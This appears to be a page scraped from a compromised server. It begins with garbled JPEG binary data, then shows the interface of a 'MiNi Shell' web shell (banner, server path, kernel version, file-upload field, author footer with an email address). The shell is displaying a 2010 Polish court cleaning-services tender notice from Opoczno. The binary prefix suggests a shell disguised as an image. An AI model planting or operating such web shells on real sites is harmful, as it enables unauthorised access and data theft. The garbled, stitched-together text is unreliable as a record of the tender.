JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100120/17448-N-2010.html

<p class="kh_header"><b>Opoczno: usługa sprzątania i utrzymywania czystości w obiekcie Sądu Rejonowego w Opocznie</b><br>
<b>Numer ogłoszenia: 17448 - 2010; data zamieszczenia: 20.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy w Opocznie , ul. Edmunda Biernackiego 20, 26-300 Opoczno, woj. łódzkie, tel. 0-44 755 71 01, faks 0-44 755 71 01.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: sądownictwo powszechne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa sprzątania i utrzymywania czystości w obiekcie Sądu Rejonowego w Opocznie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OBLIGATORYJNE WYMAGANIA DOTYCZĄCE SPRZATANIA

I.	SPRZĄTANIE POMIESZCZEŃ

-  po godzinach urzędowania Sądu, tj. po godzinie 15.30
-  jedna osoba w godzinach urzędowania tj. od 07.30 do 15. 30

1. Czynności wykonywane codziennie:

1)	Sprzątanie sal rozpraw, gabinetów sędziowskich,  sekretariatów i pozostałych pomieszczeń biurowych
2)	Kompleksowe mycie sanitariatów / muszle, umywalki /
3)	Mycie luster, kontaktów, włączników światła, grzejników
4)	Bieżące uzupełnianie WC w ręczniki papierowe, papier toaletowy, mydło, kostki WC
5)	Zamiatanie lub usuwanie kurzu z podłóg
6)	Usuwanie kurzu z parapetów, mebli i innych powierzchni dodatkowych
7)	Mycie podłóg 
8)	Odkurzanie wykładzin i dywanów
9)	Czyszczenie tablic, napisów i znaków
10)	Usuwanie odcisków palców ze szklanych powierzchni i luster
11)	Sprzątanie ciągów komunikacyjnych, korytarzy, przedsionków i łączników
12)	Mycie poręczy schodowych i schodów
13)	Opróżnianie i czyszczenie koszy na śmieci i wymiana worków
14)	Usuwanie pajęczyn
15)	Podlewanie i utrzymywanie w czystości roślin ozdobnych w budynku
16)	Inne zlecone czynności przez osoby wyznaczone do kontaktów ze strony zamawiającego

2. Czynności wykonywane co tydzień :

1)	Mycie drzwi łącznie z futrynami
2)	Czyszczenie przeszkleń drzwiowych
3)	Odkurzanie obrazów i elementów dekoracyjnych, odkurzanie sprzętu p.poż.
4)	Mycie glazury ściennej w toaletach
5)	Mycie ścian działowych, drzwi i kabin w toaletach
6)	Przetarcie listew i cokolików przypodłogowych
7)	Mycie mebli biurowych i drobnych sprzętów / bez komputerów i sprzętu elektronicznego /
8)	Mycie grzejników
9)	Przetarcie kontaktów i wyłączników elektrycznych, okablowania z kurzu
10)	Mycie tablic ogłoszeniowych
11)	Konserwacja wszystkich rodzajów podłóg - pastowanie
12)	Odkurzanie na sucho ksiąg w archiwach / kierownicy wydziałów zobowiązani są prowadzić kontrolki sprzątania /
13)	Mycie lamperii oraz krat w pomieszczeniach konwoju policyjnego
14)	Mycie okładzin ściennych

3. Czynności wykonywane co miesiąc :

1)	Czyszczenie, pranie  wycieraczek wejściowych
2)	Odkurzanie ścian i kątów

4. Czynności wykonywane 1 raz do roku

1)	Pranie żaluzji pionowych oraz rolet okiennych we wszystkich pomieszczeniach  ( ich zdjęcie i zawieszenie po wypraniu ) 

5. Czynności wykonywane  2 razy w roku (w kwietniu i wrześniu) 

1)	Mycie okien od wewnątrz i na zewnątrz 
2)	Pranie dywanów, wykładzin podłogowych, mebli tapicerowanych 
3)	Mycie opraw oświetleniowych 
4)	Odkurzanie kratek wentylacyjnych

II. OBSŁUGA DZIENNA ( serwis dzienny )

Godziny pracy - jedna  osoba w godzinach  7.30-15.30  i jej zakres obowiązków:

	obchód toalet 3 razy dziennie, uzupełnienie pojemników na papier, mydło w płynie, ręczniki papierowe, mycie podłóg wg potrzeb
	mycie sedesów, umywalek, bidetów w/g potrzeb
	potwierdzanie kontroli stanu czystości na wywieszkach zamieszczonych w toaletach
	 mycie holu głównego w ciągu dnia w/g potrzeb
	wymiana zapachów w odświeżaczach powietrza w łazienkach
	opróżnianie koszy na i z ręcznikami i pozostałymi materiałami sanitarnymi
	czyszczenie wycieraczek wewnętrznych
	sprzątanie pomieszczeń wskazanych przez zleceniodawcę
	usuwanie zanieczyszczeń pozostawionych przez interesantów tj. papierów, gum do żucia, niedopałków itp. usuwanie opakowań po materiałach biurowych
-	Sprzątanie pomieszczeń o szczególnym charakterze pracy odbywać się będzie w dniach i godzinach ustalonych wcześniej z osobami odpowiedzialnymi za dane pomieszczenia w ich obecności, dotyczy to takich pomieszczeń jak: 
	gabinety Prezesa Sądu, Wiceprezesa Sądu, Głównej Księgowej, kasy, Kierowniczki   Administracyjnej, kancelarii tajnej, pomieszczeń informatycznych po wcześniejszym uzgodnieniu godzin sprzątania;
	Sale Rozpraw po wcześniejszym uzgodnieniu godzin sprzątania;
	Pomieszczenia informatyczne - tylko i wyłącznie w obecności Informatyka lub osoby wydelegowanej przez zamawiającego za wiedzą informatyka po wcześniejszym uzgodnieniu godzin sprzątania;

-	Wszystkie prace  porządkowe będą podlegać  wyrywkowemu sprawdzaniu  przez osobę wyznaczoną przez Zamawiającego przy pomocy obiektywnych parametrów  stanu zabrudzenia np. potarcie białą ściereczką elementów  wyposażenia  lub ocen stanu zabrudzenia, dywanów wykładzin i podłóg. 
      Każdorazowo w  wyniku kontroli zostanie spisany protokół , który podpisany będzie przez   zamawiającego i wykonawcę. 

III.ZESTAWIENIE POWIERZCHNI SPRZĄTANEJ: 
-	Ogólna powierzchnia budynku  stanowi około 3 227,10 m2 w tym : 

1.  Wykładziny dywanowe						   około  23 %
2.  Parkiety							               około 6 %
1.	Posadzki ceramiczne							   około  53 % 
2.	Sanitariaty								   około   3 %
3.	Komunikacja 								   około 15 %	

-	Powierzchnia okien, na których zmontowane są verticale - 	około 655 m2  
-	Powierzchnia fasad okiennych, na których nie ma verticali - 	około 210 m2  
                      

IV. NIEOBECNOŚĆ PRACOWNIKA MUSI POWODOWAĆ    NATYCHMIASTOWE USTANOWIENIE ZASTĘPSTWA.

V. WYKONAWCA ZAPEWNI - SPRZĘTY (WIADRA, SZCZOTKI, ODKURZACZE, MASZYNY CZYSZCZĄCE, POLERKI ITP.) ORAZ NIEZBĘDNE, DOBREJ JAKOŚCI, ATESTOWANE ŚRODKI CHEMICZNE  (PŁYNY, PROSZKI, PASTY, A TAKŻE  ŚRODKI DO DEZYNFEKCJI), MATERIAŁY HIGIENICZNE DO SANITARIATÓW. 


VI. WARUNKI STAWIANE WYKONAWCY 

Wykonawca przyjmując usługę do wykonania zobowiązuje się zarazem do: 

1.	Wykonywania jej z należytą starannością zgodnie z powszechnie obowiązującymi normami w tym zakresie.
2.	Stosowania się do doraźnych poleceń osób reprezentujących Zamawiającego.
3.	Cyklicznej kontroli poziomu utrzymania czystości.
4.	Zachowania tajemnicy służbowej.
5.	ponoszenia odpowiedzialności za szkody poniesione przez Zamawiającego wskutek niewykonania lub nienależytego wykonania  obowiązków wynikających przedmiotu zamówienia 
6.	Odpowiedzialność Wykonawcy jest wyłączona tylko wówczas, gdy niewykonanie lub nienależyte wykonanie zobowiązania jest następstwem  siły wyższej
7.   Wykonawca zobowiązuje się do ubezpieczenia swojej działalności gospodarczej

8.  Wykonawca odpowiada za przestrzeganie przez swoich pracowników przepisów BHP i P.Poż. oraz za wypadki przy pracy w miejscu wykonywania usługi.
9.	Wykonawca obowiązkowo przedstawi zamawiającemu od każdego pracownika zatrudnionego przy pracach porządkowych i sprzątaniu budynku Sądu Kartę Karną, w której będzie zawarta informacja o niekaralności i oświadczenia pracowników, iż nie toczy się przeciwko nim żadne postępowanie karne pod rygorem niedopuszczenia do wykonywania obowiązków  pracownika, który tego wymogu nie spełni (karta karna) i nie dopełni (oświadczenie o braku toczącego się postępowania karnego).

VII. ZAMAWIAJĄCY JEST ZOBOWIĄZANY DO:

- Udostępnienia pomieszczenia socjalnego dla pracowników Wykonawcy, pomieszczenia przeznaczonego do przechowywania sprzętu i środków czystości wraz z prawem do korzystania z energii elektrycznej, wody, kanalizacji, ogrzewania ilekroć wymagać będzie tego należyte wykonanie usługi..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1  Opis warunków udziału w postępowaniu: o udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone  w art. 22 ust. 1 ustawy - Prawo zamówień publicznych, dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeśli przepisy prawa  nakładają obowiązek ich posiadania. 
2)	posiadania wiedzy i doświadczenia,
3)	 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
4)	sytuacji ekonomicznej i finansowej  
2. Zamawiający odrzuci  ofertę, jeżeli: 
	1)	jest niezgodna z ustawą;
 2)	 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,                 z zastrzeżeniem art. 87 ust. 2 pkt 3;
 3)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów                   o zwalczaniu nieuczciwej konkurencji;
	4)	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
5)	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu                 o udzielenie zamówienia lub 
	6)	 zawiera błędy w obliczeniu ceny;
 7)	 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3;
	8)	jest nieważna na podstawie odrębnych przepisów.

3. Wykluczenie wykonawców:
	       Zamawiajmy w niniejszym postępowaniu wykluczy wykonawców, którzy podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych. 

4. Opis sposobu dokonywania oceny spełnienia warunków udziału   w postępowaniu:
1)	Zamawiający oceni, czy wykonawca spełnia warunki, o których mowa w rozdziale V  na podstawie złożonych wraz z ofertą oświadczeń: o spełnieniu warunków udziału w postępowaniu i barku podstaw do wykluczenia z postępowania, a także  na podstawie złożonych wraz z ofertą dokumentów  żądanych przez zamawiającego , o których mowa w rozdziale VI SIWS. Ocena spełnienia warunków udziału w postępowaniu  zostanie dokonana  w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu  metodą warunku granicznego spełnia - nie spełnia
2)	 Jeżeli wykonawca nie dołączy do oferty wymaganych dokumentów lub z treści
       dołączonych dokumentów nie będzie wynikać, że zostały spełnione warunki udziału w postępowaniu to zamawiający wykluczy wykonawcę z postępowania odpowiednio na podstawie art. 24 ust. 1 lub ust. 2 ustawy. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na ofertę składają się następujące załączniki:
1) oświadczenie o spełnieniu  warunków udziału w postępowaniu - w załączeniu druk do  wykorzystania (załącznik nr 5 do SIWZ) - oryginał oświadczenia  podpisany i wypełniony przez osobę /osoby uprawnioną/uprawnione  do reprezentowania Wykonawcy,
2) formularz ofertowy - w załączeniu druk do  wykorzystania (załącznik nr 3 do SIWZ) - oryginał oświadczenia  podpisany i wypełniony przez osobę -osoby uprawnioną -uprawnione  do reprezentowania Wykonawcy,
3) formularz cenowy - w załączeniu druk do  wykorzystania (załącznik nr 4 do SIWZ) - oryginał oświadczenia  podpisany i wypełniony przez osobę -osoby uprawnioną - uprawnione  do reprezentowania Wykonawcy,
4) oświadczenie o braku podstaw  do wykluczenia z postępowania  o udzielenie zamówienia - w załączeniu druk do  wykorzystania (załącznik nr 5 do SIWZ) - oryginał oświadczenia  podpisany i wypełniony przez osobę osoby uprawnioną/ uprawnione  do reprezentowania wykonawcy
5)  wzór umowy (załącznik nr 1 do SIWZ) - podpisany przez osobę - osoby uprawnioną / uprawnione  do reprezentowania Wykonawcy.
6)	formularz  - Obligatoryjne wymagania dotyczące sprzątania- (załącznik nr 2 do SIWZ) - podpisany przez osobę -osoby uprawnioną -uprawnione  do reprezentowania Wykonawcy.
2. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy z powodu okoliczności, o których mowa w art. 24 ust. 1 
ustawy Prawo zamówień publicznych  zamawiający  żąda  od wykonawców następujących dokumentów: 
1)  aktualnego odpisu z właściwego rejestru,  jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw  do wykluczenia  w oparciu o art.. 24 ust. 1 pkt 2 ustawy, wystawionego  nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczeń w zakresie  art. 24 ust. 1 pkt 2 ustawy.
2) aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie  zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału  w postępowaniu  o udzielenie zamówienia albo składania ofert - oryginał lub kserokopia dokumentu  poświadczona za zgodność z oryginałem  przez Wykonawcę lub osoby osobę  uprawnioną do reprezentowania Wykonawcy.
3)  aktualnego zaświadczenia właściwego Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie  zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne  lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału  w postępowaniu  o udzielenie zamówienia albo składania ofert - oryginał lub kserokopia dokumentu  poświadczona za zgodność z oryginałem  przez Wykonawcę lub osoby osobę  uprawnioną do reprezentowania Wykonawcy.
3. W celu wykazania spełnienia przez wykonawcę warunków, o których mowa  w art.  22 ust. 1 ustawy Prawo zamówień publicznych zamawiający żąda: 
wykazu wykonanych, a w przypadku  świadczeń okresowych lub ciągłych  również wykonywanych usług (co najmniej dwóch) w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem składania ofert albo wniosków  o dopuszczenie  do  udziału  w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie. Wykaz powinien zawierać  następujące informacje: 
 - odbiorcę zlecenia (pełna nazwa i adres)
 - daty wykonania/wykonywania zlecenia: dzień, miesiąc, rok. - podpisany przez osobę osoby  uprawnione do reprezentowania wykonawcy. 
4.Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt. 2 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)  nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem składania ofert,
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu                          - wystawiony nie wcześniej  niż 3 miesiące  przed upływem terminu składania ofert,
3) nie oznaczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert. 
       
5. Dokumenty sporządzone w języku obcym są składane wraz z   tłumaczenia na język polski dokonanego przez tłumacza przysięgłego lub kserokopią tłumaczenia  poświadczoną za zgodności z oryginałem  przez Wykonawcę lub  osobę/ osoby uprawnione do reprezentowania Wykonawcy.
6. W przypadku poświadczenia  za zgodność z oryginałem kopii dokumentów przez osobę/osoby  nie wymienioną/wymienione w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału lub poświadczonej notarialnie  za zgodność z oryginałem kopii.
7. Brak jakichkolwiek wymaganych dokumentów, lub złożenie dokumentu w niewłaściwej formie (np. niedoświadczone za zgodność z oryginałem  kopie) spowoduje wykluczenie  Wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.opoczno.sr.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy w Opocznie
26-300 Opoczno, ul. Biernackiego 20
pokój nr 101 na I pietrze.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2010 godzina 12:00, miejsce: Sąd Rejonowy w Opocznie
26-300 Opoczno
ul. Biernackiego 20
Oddział Administracyjny - pokój nr 101 na I pietrze.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com